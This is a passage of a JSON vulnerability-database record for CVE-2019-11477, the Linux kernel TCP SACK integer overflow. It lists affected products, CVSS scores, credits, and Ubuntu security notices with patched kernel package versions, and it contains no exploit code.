                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_aus:6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_aus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:enterprise_linux_atomic_host:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_mrg:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_policy_secure:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_virtual_application_delivery_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ivanti:connect_secure:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:traffix_signaling_delivery_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.1.0",
                "versionStartIncluding": "5.0.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-11477"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jonathan Looney (Netflix Information Security), This vulnerability is caused by Netflix Researcher Jonathan Looney Find .,Jonathan Looney",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-681"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-11477",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-143127",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2019-11477",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security@ubuntu.com",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-11477",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "security@ubuntu.com",
            "id": "CVE-2019-11477",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201906-681",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-143127",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-11477",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-143127"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-11477"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-681"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11477"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11477"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jonathan Looney discovered that the TCP_SKB_CB(skb)-\u003etcp_gso_segs value was subject to an integer overflow in the Linux kernel when handling TCP Selective Acknowledgments (SACKs). A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commit 3b4929f65b0d8249f19a50245cd88ed1a2f78cff. Multiple TCP Selective Acknowledgement (SACK) and Maximum Segment Size (MSS) networking vulnerabilities may cause denial-of-service conditions in Linux and FreeBSD kernels. A successful exploit could cause the targeted system to crash, resulting in a DoS condition. \nProof-of-concept (PoC) code that demonstrates an exploit of this vulnerability is publicly available. \nKernel.org has confirmed the vulnerability and released software updates. ==========================================================================\nKernel Live Patch Security Notice 0058-1\nOctober 22, 2019\n\nlinux vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu:\n\n| Series           | Base kernel  | Arch     | flavors          |\n|------------------+--------------+----------+------------------|\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | aws              |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | generic          |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | lowlatency       |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | oem              |\n| Ubuntu 18.04 LTS | 5.0.0        | amd64    | azure            |\n| Ubuntu 14.04 LTS | 4.4.0        | amd64    | generic          |\n| Ubuntu 14.04 LTS | 4.4.0        | amd64    | lowlatency       |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | aws              |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | generic          |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | lowlatency       |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | azure            |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | generic          |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | lowlatency       |\n\nSummary:\n\nSeveral security issues were fixed in the kernel. \n\nSoftware Description:\n- linux: Linux kernel\n\nDetails:\n\nIt was discovered that a race condition existed in the GFS2 file system in\nthe Linux kernel. (CVE-2016-10905)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. (CVE-2018-20856)\n\nIt was discovered that the USB gadget Midi driver in the Linux kernel\ncontained a double-free vulnerability when handling certain error\nconditions. (CVE-2018-20961)\n\nIt was discovered that the XFS file system in the Linux kernel did not\nproperly handle mount failures in some situations. (CVE-2018-20976)\n\nIt was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not\ndid not handle detach operations correctly, leading to a use-after-free\nvulnerability. \n(CVE-2018-21008)\n\nIt was discovered that the Intel Wi-Fi device driver in the Linux kernel\ndid not properly validate certain Tunneled Direct Link Setup (TDLS). (CVE-2019-0136)\n\nIt was discovered that the Linux kernel on ARM processors allowed a tracing\nprocess to modify a syscall after a seccomp decision had been made on that\nsyscall. (CVE-2019-2181)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux\nkernel did not properly validate the BSS descriptor. (CVE-2019-3846)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux\nkernel did not properly check for missing tty operations. (CVE-2019-11478)\n\nIt was discovered that the ext4 file system implementation in the Linux\nkernel did not properly zero out memory in some situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2019-11833)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux kernel\ndid not properly check for allocation errors in some situations. (CVE-2019-12614)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate meta data, leading to a buffer overread. \n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. \n(CVE-2019-14284)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. (CVE-2019-14814)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. (CVE-2019-14815)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. (CVE-2019-14816)\n\nMatt Delco discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform bounds checking when handling coalesced\nMMIO write operations. (CVE-2019-14821)\n\nPeter Pi discovered a buffer overflow in the virtio network backend\n(vhost_net) implementation in the Linux kernel. (CVE-2019-14835)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your livepatches to the following\nversions:\n\n| Kernel                   | Version  | flavors                  |\n|--------------------------+----------+--------------------------|\n| 4.4.0-148.174            | 58.1     | lowlatency, generic      |\n| 4.4.0-148.174~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-150.176            | 58.1     | generic, lowlatency      |\n| 4.4.0-150.176~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-151.178            | 58.1     | lowlatency, generic      |\n| 4.4.0-151.178~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-154.181            | 58.1     | lowlatency, generic      |\n| 4.4.0-154.181~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-157.185            | 58.1     | lowlatency, generic      |\n| 4.4.0-157.185~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-159.187            | 58.1     | lowlatency, generic      |\n| 4.4.0-159.187~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-161.189            | 58.1     | lowlatency, generic      |\n| 4.4.0-161.189~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-164.192            | 58.1     | lowlatency, generic      |\n| 4.4.0-164.192~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-165.193            | 58.1     | generic, lowlatency      |\n| 4.4.0-1083.93            | 58.1     | aws                      |\n| 4.4.0-1084.94            | 58.1     | aws                      |\n| 4.4.0-1085.96            | 58.1     | aws                      |\n| 4.4.0-1087.98            | 58.1     | aws                      |\n| 4.4.0-1088.99            | 58.1     | aws                      |\n| 4.4.0-1090.101           | 58.1     | aws                      |\n| 4.4.0-1092.103           | 58.1     | aws                      |\n| 4.4.0-1094.105           | 58.1     | aws                      |\n| 4.15.0-50.54             | 58.1     | generic, lowlatency      |\n| 4.15.0-50.54~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-51.55             | 58.1     | generic, lowlatency      |\n| 4.15.0-51.55~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-52.56             | 58.1     | lowlatency, generic      |\n| 4.15.0-52.56~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-54.58             | 58.1     | generic, lowlatency      |\n| 4.15.0-54.58~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-55.60             | 58.1     | generic, lowlatency      |\n| 4.15.0-58.64             | 58.1     | generic, lowlatency      |\n| 4.15.0-58.64~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-60.67             | 58.1     | lowlatency, generic      |\n| 4.15.0-60.67~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-62.69             | 58.1     | generic, lowlatency      |\n| 4.15.0-62.69~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-64.73             | 58.1     | generic, lowlatency      |\n| 4.15.0-64.73~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-65.74             | 58.1     | lowlatency, generic      |\n| 4.15.0-1038.43           | 58.1     | oem                      |\n| 4.15.0-1039.41           | 58.1     | aws                      |\n| 4.15.0-1039.44           | 58.1     | oem                      |\n| 4.15.0-1040.42           | 58.1     | aws                      |\n| 4.15.0-1041.43           | 58.1     | aws                      |\n| 4.15.0-1043.45           | 58.1     | aws                      |\n| 4.15.0-1043.48           | 58.1     | oem                      |\n| 4.15.0-1044.46           | 58.1     | aws                      |\n| 4.15.0-1045.47           | 58.1     | aws                      |\n| 4.15.0-1045.50           | 58.1     | oem                      |\n| 4.15.0-1047.49           | 58.1     | aws                      |\n| 4.15.0-1047.51           | 58.1     | azure                    |\n| 4.15.0-1048.50           | 58.1     | aws                      |\n| 4.15.0-1049.54           | 58.1     | azure                    |\n| 4.15.0-1050.52           | 58.1     | aws                      |\n| 4.15.0-1050.55           | 58.1     | azure                    |\n| 4.15.0-1050.57           | 58.1     | oem                      |\n| 4.15.0-1051.53           | 58.1     | aws                      |\n| 4.15.0-1051.56           | 58.1     | azure                    |\n| 4.15.0-1052.57           | 58.1     | azure                    |\n| 4.15.0-1055.60           | 58.1     | azure                    |\n| 4.15.0-1056.61           | 58.1     | azure                    |\n| 4.15.0-1056.65           | 58.1     | oem                      |\n| 4.15.0-1057.62           | 58.1     | azure                    |\n| 4.15.0-1057.66           | 58.1     | oem                      |\n| 4.15.0-1059.64           | 58.1     | azure                    |\n| 5.0.0-1014.14~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1016.17~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1018.19~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1020.21~18.04.1    | 58.1     | azure                    |\n\nSupport Information:\n\nKernels older than the levels listed below do not receive livepatch\nupdates. Please upgrade your kernel as soon as possible. \n\n| Series           | Version          | Flavors                  |\n|------------------+------------------+--------------------------|\n| Ubuntu 18.04 LTS | 4.15.0-1039      | aws                      |\n| Ubuntu 16.04 LTS | 4.4.0-1083       | aws                      |\n| Ubuntu 18.04 LTS | 5.0.0-1000       | azure                    |\n| Ubuntu 16.04 LTS | 4.15.0-1047      | azure                    |\n| Ubuntu 18.04 LTS | 4.15.0-50        | generic lowlatency       |\n| Ubuntu 16.04 LTS | 4.15.0-50        | generic lowlatency       |\n| Ubuntu 14.04 LTS | 4.4.0-148        | generic lowlatency       |\n| Ubuntu 18.04 LTS | 4.15.0-1038      | oem                      |\n| Ubuntu 16.04 LTS | 4.4.0-148        | generic lowlatency       |\n\nReferences:\n  CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, \n  CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, \n  CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, \n  CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, \n  CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, \n  CVE-2019-14821, CVE-2019-14835\n\n\n-- \nubuntu-security-announce mailing list\nubuntu-security-announce@lists.ubuntu.com\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\n. \n(CVE-2019-11477)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 19.04:\n  linux-image-5.0.0-1008-aws      5.0.0-1008.8\n  linux-image-5.0.0-1008-gcp      5.0.0-1008.8\n  linux-image-5.0.0-1008-kvm      5.0.0-1008.8\n  linux-image-5.0.0-1010-raspi2   5.0.0-1010.10\n  linux-image-5.0.0-1014-snapdragon  5.0.0-1014.14\n  linux-image-5.0.0-17-generic    5.0.0-17.18\n  linux-image-5.0.0-17-generic-lpae  5.0.0-17.18\n  linux-image-5.0.0-17-lowlatency  5.0.0-17.18\n  linux-image-aws                 5.0.0.1008.8\n  linux-image-gcp                 5.0.0.1008.8\n  linux-image-generic             5.0.0.17.18\n  linux-image-generic-lpae        5.0.0.17.18\n  linux-image-gke                 5.0.0.1008.8\n  linux-image-kvm                 5.0.0.1008.8\n  linux-image-lowlatency          5.0.0.17.18\n  linux-image-raspi2              5.0.0.1010.7\n  linux-image-snapdragon          5.0.0.1014.7\n  linux-image-virtual             5.0.0.17.18\n\nUbuntu 18.10:\n  linux-image-4.18.0-1013-gcp     4.18.0-1013.14\n  linux-image-4.18.0-1014-kvm     4.18.0-1014.14\n  linux-image-4.18.0-1016-raspi2  4.18.0-1016.18\n  linux-image-4.18.0-1018-aws     4.18.0-1018.20\n  linux-image-4.18.0-1020-azure   4.18.0-1020.20\n  linux-image-4.18.0-22-generic   4.18.0-22.23\n  linux-image-4.18.0-22-generic-lpae  4.18.0-22.23\n  linux-image-4.18.0-22-lowlatency  4.18.0-22.23\n  linux-image-4.18.0-22-snapdragon  4.18.0-22.23\n  linux-image-aws                 4.18.0.1018.18\n  linux-image-azure               4.18.0.1020.21\n  linux-image-gcp                 4.18.0.1013.13\n  linux-image-generic             4.18.0.22.23\n  linux-image-generic-lpae        4.18.0.22.23\n  linux-image-gke                 4.18.0.1013.13\n  linux-image-kvm                 4.18.0.1014.14\n  linux-image-lowlatency          4.18.0.22.23\n  linux-image-raspi2              4.18.0.1016.13\n  linux-image-snapdragon          4.18.0.22.23\n  linux-image-virtual             4.18.0.22.23\n\nUbuntu 18.04 LTS:\n  linux-image-4.15.0-1015-oracle  4.15.0-1015.17\n  linux-image-4.15.0-1034-gcp     4.15.0-1034.36\n  linux-image-4.15.0-1036-kvm     4.15.0-1036.36\n  linux-image-4.15.0-1038-raspi2  4.15.0-1038.40\n  linux-image-4.15.0-1041-aws     4.15.0-1041.43\n  linux-image-4.15.0-1043-oem     4.15.0-1043.48\n  linux-image-4.15.0-1055-snapdragon  4.15.0-1055.59\n  linux-image-4.15.0-52-generic   4.15.0-52.56\n  linux-image-4.15.0-52-generic-lpae  4.15.0-52.56\n  linux-image-4.15.0-52-lowlatency  4.15.0-52.56\n  linux-image-4.18.0-1020-azure   4.18.0-1020.20~18.04.1\n  linux-image-4.18.0-22-generic   4.18.0-22.23~18.04.1\n  linux-image-4.18.0-22-generic-lpae  4.18.0-22.23~18.04.1\n  linux-image-4.18.0-22-lowlatency  4.18.0-22.23~18.04.1\n  linux-image-4.18.0-22-snapdragon  4.18.0-22.23~18.04.1\n  linux-image-aws                 4.15.0.1041.40\n  linux-image-azure               4.18.0.1020.19\n  linux-image-gcp                 4.15.0.1034.36\n  linux-image-generic             4.15.0.52.54\n  linux-image-generic-hwe-18.04   4.18.0.22.72\n  linux-image-generic-lpae        4.15.0.52.54\n  linux-image-generic-lpae-hwe-18.04  4.18.0.22.72\n  linux-image-kvm                 4.15.0.1036.36\n  linux-image-lowlatency          4.15.0.52.54\n  linux-image-lowlatency-hwe-18.04  4.18.0.22.72\n  linux-image-oem                 4.15.0.1043.47\n  linux-image-oracle              4.15.0.1015.18\n  linux-image-raspi2              4.15.0.1038.36\n  linux-image-snapdragon          4.15.0.1055.58\n  linux-image-snapdragon-hwe-18.04  4.18.0.22.72\n  linux-image-virtual             4.15.0.52.54\n  linux-image-virtual-hwe-18.04   4.18.0.22.72\n\nUbuntu 16.04 LTS:\n  linux-image-4.15.0-1015-oracle  4.15.0-1015.17~16.04.1\n  linux-image-4.15.0-1034-gcp     4.15.0-1034.36~16.04.1\n  linux-image-4.15.0-1041-aws     4.15.0-1041.43~16.04.1\n  linux-image-4.15.0-1047-azure   4.15.0-1047.51\n  linux-image-4.15.0-52-generic   4.15.0-52.56~16.04.1\n  linux-image-4.15.0-52-generic-lpae  4.15.0-52.56~16.04.1\n  linux-image-4.15.0-52-lowlatency  4.15.0-52.56~16.04.1\n  linux-image-4.4.0-1048-kvm      4.4.0-1048.55\n  linux-image-4.4.0-1085-aws      4.4.0-1085.96\n  linux-image-4.4.0-1111-raspi2   4.4.0-1111.120\n  linux-image-4.4.0-1115-snapdragon  4.4.0-1115.121\n  linux-image-4.4.0-151-generic   4.4.0-151.178\n  linux-image-4.4.0-151-generic-lpae  4.4.0-151.178\n  linux-image-4.4.0-151-lowlatency  4.4.0-151.178\n  linux-image-4.4.0-151-powerpc-e500mc  4.4.0-151.178\n  linux-image-4.4.0-151-powerpc-smp  4.4.0-151.178\n  linux-image-4.4.0-151-powerpc64-emb  4.4.0-151.178\n  linux-image-4.4.0-151-powerpc64-smp  4.4.0-151.178\n  linux-image-aws                 4.4.0.1085.88\n  linux-image-aws-hwe             4.15.0.1041.41\n  linux-image-azure               4.15.0.1047.51\n  linux-image-gcp                 4.15.0.1034.48\n  linux-image-generic             4.4.0.151.159\n  linux-image-generic-hwe-16.04   4.15.0.52.73\n  linux-image-generic-lpae        4.4.0.151.159\n  linux-image-generic-lpae-hwe-16.04  4.15.0.52.73\n  linux-image-gke                 4.15.0.1034.48\n  linux-image-kvm                 4.4.0.1048.48\n  linux-image-lowlatency          4.4.0.151.159\n  linux-image-lowlatency-hwe-16.04  4.15.0.52.73\n  linux-image-oem                 4.15.0.52.73\n  linux-image-oracle              4.15.0.1015.9\n  linux-image-powerpc-e500mc      4.4.0.151.159\n  linux-image-powerpc-smp         4.4.0.151.159\n  linux-image-powerpc64-emb       4.4.0.151.159\n  linux-image-powerpc64-smp       4.4.0.151.159\n  linux-image-raspi2              4.4.0.1111.111\n  linux-image-snapdragon          4.4.0.1115.107\n  linux-image-virtual             4.4.0.151.159\n  linux-image-virtual-hwe-16.04   4.15.0.52.73\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually 